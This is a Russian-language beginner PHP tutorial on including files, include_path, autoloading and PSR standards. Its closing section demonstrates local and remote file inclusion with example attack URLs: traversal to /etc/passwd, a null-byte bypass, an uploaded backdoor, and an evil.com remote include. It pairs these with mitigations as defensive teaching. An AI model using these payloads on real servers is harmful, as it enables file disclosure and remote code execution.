Хабрахабр

PHP для начинающих. Подключение файлов

image

В продолжении серии «PHP для начинающих», сегодняшняя статья будет посвящена тому, как PHP ищет и подключает файлы.

Для чего и почему

PHP это скриптовый язык, созданный изначально для быстрого ваяния домашних страничек (да, да изначально это же был Personal Home Page Tools), а в дальнейшем на нём уже стали создавать магазины, социалки и другие поделки на коленке которые выходят за рамки задуманного, но к чему это я – а к тому, что чем больше функционала закодировано, тем больше желание его правильно структурировать, избавиться от дублирования кода, разбить на логические кусочки и подключать лишь при необходимости (это тоже самое чувство, которое возникло у вас, когда вы читали это предложение, его можно было бы разбить на отдельные кусочки). Для этой цели в PHP есть несколько функции, общий смысл которых сводится к подключению и интерпретации указанного файла. Давайте рассмотрим на примере подключения файлов:

// file variable.php
$a = 0; // file increment.php
$a++; // file index.php
include ('variable.php');
include ('increment.php');
include ('increment.php'); echo $a;

Если запустить скрипт index.php, то PHP всё это будет последовательно подключать и выполнять:

$a = 0;
$a++;
$a++;
echo $a; // выведет 2

Когда файл подключается, то его код оказывается в той же области видимости, что и строка в которой его подключили, таким образом все переменные, доступные в данной строке будут доступны и в подключаемом файле. Если в подключаемом файле были объявлены классы или функции, то они попадают в глобальную область видимости (если конечно для них не был указан namespace).

Если вы подключаете файл внутри функции, то подключаемые файлы получают доступ к области видимости функции, таким образом следующий код тоже будет работать:

function() { $a = 0; include ('increment.php'); include ('increment.php'); echo $a;
}
a(); // выведет 2

Отдельно отмечу магические константы: __DIR__, __FILE__, __LINE__ и прочие — они привязаны к контексту и выполняются до того, как происходит включение

Особенностью подключения файлов является тот момент, что при подключении файла парсинг переключается в режим HTML, по этой причине любой код внутри включаемого файла должен быть заключен в PHP теги:

<?php
// подключаемый код
// ...
//
?>

Если у вас в файле только PHP код, то закрывающий тег принято опускать, дабы случайно не забыть какие-нить символы после закрывающего тега, что чревато проблемами (об этом я ещё расскажу в следующей статье).

Аж слёзы на глазах (╥_╥)… А вы видели сайт-файл на 10 000 строк?

Функции подключения файлов

Как уже было сказано выше, в PHP существует несколько функций для подключения файлов:

  • include — включает и выполняет указанный файл, если не находит — выдаёт предупреждение E_WARNING
  • include_once — аналогично функции выше, но включает файл единожды
  • require — включает и выполняет указанный файл, если не находит — выдаёт фатальную ошибку E_ERROR
  • require_once — аналогично функции выше, но включает файл единожды

Кроме всего прочего есть и другие способы подключения и выполнения файлов, но это уже сами копайте, пусть это будет для вас «задание со звёздочкой» 😉 В действительности, это не совсем функции, это специальные языковые конструкции, и можно круглые скобочки не использовать.

Давайте разберём на примерах различия между require и require_once, возьмём один файл echo.php:

<p>text of file echo.php</p>

И будем его подключать несколько раз:

<?php
// подключит и выполнит файл
// вернёт 1
require_once 'echo.php'; // файл не будет подключён, т.к. уже подключали
// вернёт true
require_once 'echo.php'; // подключит и выполнит файл
// вернёт 1
require 'echo.php';

Результатом выполнения будет два подключения файла echo.php:

<p>text of file echo.php</p>
<p>text of file echo.php</p>

Существует ещё парочка директив, которые влияют на подключение, но они вам не потребуются — auto_prepend_file и auto_append_file. Эти директивы позволяют установить файлы которые будут подключены до подключения всех файлов и после выполнения всех скриптов соответственно. Я даже не могу придумать «живой» сценарий, когда это может потребоваться.

Задание

Таки придумать и реализовать сценарий по использованию директив auto_prepend_file и auto_append_file, менять их можно только в php.ini, .htaccess или httpd.conf (см. PHP_INI_PERDIR) 🙂

Где ищет?

PHP ищет подключаемые файлы в директориях прописанных в директиве include_path. Эта директива также влияет на работу функций fopen(), file(), readfile() и file_get_contents(). Алгоритм работы достаточно простой — при поиске файлов PHP по очереди проверяет каждую директорию из include_path, пока не найдет подключаемый файл, если не найдёт — вернёт ошибку. Для изменения include_path из скрипта следует использовать функцию set_include_path().

При настройке include_path следует учитывать один важный момент — в качестве разделителя путей в Windows и Linux используются различные символы — ";" и ":" соответственно, так что при указании своей директории используйте константу PATH_SEPARATOR, например:

// пример пути в linux
$path = '/home/dev/library'; // пример пути в windows
$path = 'c:\Users\Dev\Library'; // для linux и windows код изменение include_path идентичный
set_include_path(get_include_path() . PATH_SEPARATOR . $path);

Когда вы прописываете include_path в ini файле, то можете использовать переменные окружения типа $:

include_path = ".:${USER}/my-php-library"

Если при подключении файла вы прописываете абсолютный путь (начинающийся с "/") или относительный (начинающийся с "." или ".."), то директива include_path будет проигнорирована, а поиск будет осуществлён только по указанному пути.

4), и я надеюсь вы сталкиваться с ним не будете, но если вдруг, то чтобы знали, что такое было, но прошло... Возможно стоило бы рассказать и про safe_mode, но это уже давно история (с версии 5.

Использование return

Расскажу о небольшом life-hack'е — если подключаемый файл возвращает что-либо с использованием конструкции return, то эти данные можно получить и использовать, таким образом можно легко организовать подключение файлов конфигурации, приведу пример для наглядности:

return [ 'host' => 'localhost', 'user' => 'root', 'pass' => ''
];

$dbConfig = require 'config/db.php'; var_dump($dbConfig); /*
array( 'host' => 'localhost', 'user' => 'root', 'pass' => ''
)
*/

Занимательные факты, без которых жилось и так хорошо: если во включаемом файле определены функции, то они могут быть использованы в основном файле вне зависимости от того, были ли они объявлены до return или после

Задание

Написать код, который будет собирать конфигурацию из нескольких папок и файлов. Структура файлов следующая:

config
|-- default
| |-- db.php
| |-- debug.php
| |-- language.php
| `-- template.php
|-- development
| `-- db.php
`-- production |-- db.php `-- language.php

При этом код должен работать следующим образом:

  • если в системном окружении есть переменная PROJECT_PHP_SERVER и она равна development, то должны быть подключены все файлы из папки default, данные занесены в перемененную $config, затем подключены файлы из папки development, а полученные данные должны перетереть соответствующие пункты сохраненные в $config
  • аналогичное поведение если PROJECT_PHP_SERVER равна production (естественно только для папки production)
  • если переменной нет, или она задана неверно, то подключаются только файлы из папки default

Автоматическое подключение

Конструкции с подключением файлов выглядят очень громоздко, так и ещё и следить за их обновлением — ещё тот подарочек, зацените кусочек кода из примера статьи про исключения:

// load all files w/out autoloader
require_once 'Education/Command/AbstractCommand.php';
require_once 'Education/CommandManager.php';
require_once 'Education/Exception/EducationException.php';
require_once 'Education/Exception/CommandManagerException.php';
require_once 'Education/Exception/IllegalCommandException.php';
require_once 'Education/RequestHelper.php';
require_once 'Education/Front.php';

Первой попыткой избежать подобного «счастья» было появление функции __autoload. Сказать точнее, это была даже не определенная функция, эту функцию вы должны были определить сами, и уже с её помощью нужно было подключать необходимые нам файлы по имени класса. Единственным правилом считалось, что для каждого класса должен быть создан отдельный файл по имени класса (т.е. myClass должен быть внутри файла myClass.php). Вот пример реализации такой функции __autoload() (взят из комментариев к официальному руководству):

Класс который будем подключать:

// класс myClass в отдельном файле myClass.php
class myClass { public function __construct() { echo "myClass init'ed successfuly!!!"; }
}

Файл, который подключает данный класс:

// пример реализации
// ищем файлы согласно директивы include_path
function __autoload($classname) { $filename = $classname .".php"; include_once $filename;
} // создаём класс
$obj = new myClass();

Теперь о проблемах с данной функцией — представьте ситуацию, что вы подключаете сторонний код, а там уже кто-то прописал функцию __autoload() для своего кода, и вуаля:

Fatal error: Cannot redeclare __autoload()

Чтобы такого не было, создали функцию, которая позволяет регистрировать произвольную функцию или метод в качестве загрузчика классов — spl_autoload_register. Т.е. мы можем создать несколько функций с произвольным именем для загрузки классов, и зарегистрировать их с помощью spl_autoload_register. Теперь index.php будет выглядеть следующим образом:

// пример реализации
// ищем файлы согласно директивы include_path
function myAutoload($classname) { $filename = $classname .".php"; include_once($filename);
} // регистрируем загрузчик
spl_autoload_register('myAutoload'); // создаём класс
$obj = new myClass();

Рубрика «а вы знали?»: первый параметр spl_autoload_register() не является обязательным, и вызвав функцию без него, в качестве загрузчика будет использоваться функция spl_autoload, поиск будет осуществлён по папкам из include_path и файлам с расширением .php и .inc, но этот список можно расширить с помощью функции spl_autoload_extensions

Теперь каждый разработчик может регистрировать свой загрузчик, главное чтобы имена классов не совпадали, но это не должно стать проблемой, если вы используете пространства имён.

1, а это значит, что в обозримом будущем данную функцию и вовсе уберут (Х_х) Поскольку уже давно существует такой продвинутый функционал как spl_autoload_register(), то функцию __autoload() уже заявлена как deprecated в PHP 7.

Ну более-менее картина прояснилась, хотя погодите, все зарегистрированные загрузчики становятся в очередь, по мере их регистрации, соответственно, если кто-то нахимичил в своё загрузчике, то вместо ожидаемого результата может получится очень неприятный баг. Чтобы такого не было, взрослые умные дядьки описали стандарт, который позволяет подключать сторонние библиотеки без проблем, главное чтобы организация классов в них соответствовала стандарту PSR-0 (устарел уже лет 10 как) или PSR-4. В чём суть требований описанных в стандартах:

  1. Каждая библиотека должна жить в собственном пространстве имён (т.н. vendor namespace)
  2. Для каждого пространства имён должна быть создана собственная папка
  3. Внутри пространства имён могут быть свои подпространства — тоже в отдельных папках
  4. Один класс — один файл
  5. Имя файла с расширением .php должно точно соответствовать имени класса

Пример из мануала:

Полное имя класса

Пространство имён

Базовая директория

Полный путь

\Acme\Log\Writer\File_Writer

Acme\Log\Writer

./acme-log-writer/lib/

./acme-log-writer/lib/File_Writer.php

\Aura\Web\Response\Status

Aura\Web

/path/to/aura-web/src/

/path/to/aura-web/src/Response/Status.php

\Symfony\Core\Request

Symfony\Core

./vendor/Symfony/Core/

./vendor/Symfony/Core/Request.php

\Zend\Acl

Zend

/usr/includes/Zend/

/usr/includes/Zend/Acl.php

до версии 5. Различия этих двух стандартов, лишь в том, что PSR-0 поддерживает старый код без пространства имён (т.е. 0), а PSR-4 избавлен от этого анахронизма, да ещё и позволяет избежать ненужной вложенности папок. 3.

Если кто пропустил, то есть хороший доклад от pronskiy про данный инструмент. Благодаря этим стандартам, стало возможно появление такого инструмента как composer — универсального менеджера пакетов для PHP.

PHP-инъекция

Ещё хотел рассказать о первой ошибки всех, кто делает единую точку входа для сайта в одном index.php и называет это MVC-фреймворком:

<?php
$page = $_GET['page'] ?? die('Wrong filename'); if (!is_file($page)) { die('Wrong filename');
} include $page;

Смотришь на код, и так и хочется чего-нить вредоносного туда передать:

// получить неожиданное поведение системы
http://domain.com/index.php?page=../index.php // прочитать файлы в директории сервера
http://domain.com/index.php?page=config.ini // прочитать системные файлы
http://domain.com/index.php?page=/etc/passwd // запустить файлы, которые мы заранее залили на сервер
http://domain.com/index.php?page=user/backdoor.php

Первое, что приходит на ум — принудительно добавлять расширение .php, но в ряде случаев это можно обойти «благодаря» уязвимости нулевого байта (почитайте, эту уязвимость уже давно исправили, но вдруг вам попадётся интерпретатор более древний, чем PHP 5.3, ну и для общего развития тоже рекомендую):

// прочитать системные файлы
http://domain.com/index.php?page=/etc/passwd%00

В современных версиях PHP наличие символа нулевого байта в пути подключаемого файла сразу приводит к соответствующей ошибке подключения, и даже если указанный файл существует и его можно подключить, то в результате всегда будет ошибка, проверяется это следующим образом strlen(Z_STRVAL_P(inc_filename)) != Z_STRLEN_P(inc_filename) (это из недров самого PHP)

Вторая «стоящая» мысль, это проверка на нахождение файла в текущей директории:

<?php
$page = $_GET['page'] ?? die('Wrong filename'); if (strpos(realpath($page), __DIR__) !== 0) { die('Wrong path to file');
} include $page . '.php';

Третья, но не последняя модификация проверки, это использование директивы open_basedir, с её помощью можно указать директорию, где именно PHP будет искать файлы для подключения:

<?php
$page = $_GET['page'] ?? die('Wrong filename'); ini_set('open_basedir', __DIR__); include $page . '.php';

включая данное ограничение вы должны быть уверены, что ничего не забыли вне указанной директории, ни кешированные данные, ни какие-либо пользовательские файлы (хотя функции is_uploaded_file() и move_uploaded_file() продолжат работать с временной папкой для загруженных файлов). Будьте внимательны, данная директива влияет не только на подключение файлов, но и на всю работу с файловой системой, т.е.

Какие ещё возможны проверки? Уйма вариантов, всё зависит от архитектуры вашего приложения.

Хотел ещё вспомнить о существовании «чудесной» директивы allow_url_include (у неё зависимость от allow_url_fopen), она позволяет подключать и выполнять удаленный PHP файлы, что куда как опасней для вашего сервера:

// подключаем удалённый PHP скрипт
http://domain.com/index.php?page=http://evil.com/index.php

Увидели, запомнили, и никогда не пользуйтесь, благо по умолчанию выключено. Данная возможность вам потребуется чуть реже, чем никогда, во всех остальных случаях закладывайте правильную архитектуру приложения, где различные части приложения общаются посредством API.

Задание

Написать скрипт, который позволит подключать php-скрипты из текущей папки по названию, при этом следуют помнить о возможных уязвимостях и не допустить промашек.

В заключение

Данная статья — основа-основ в PHP, так что изучайте внимательно, выполняйте задания и не филоньте, за вас никто учить не будет.

P.S.

Это репост из серии статей «PHP для начинающих»:
Если у вас есть замечания по материалу статьи, или возможно по форме, то описывайте в комментариях суть, и мы сделаем данный материал ещё лучше.

Теги
Показать больше

Похожие статьи

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Кнопка «Наверх»
Закрыть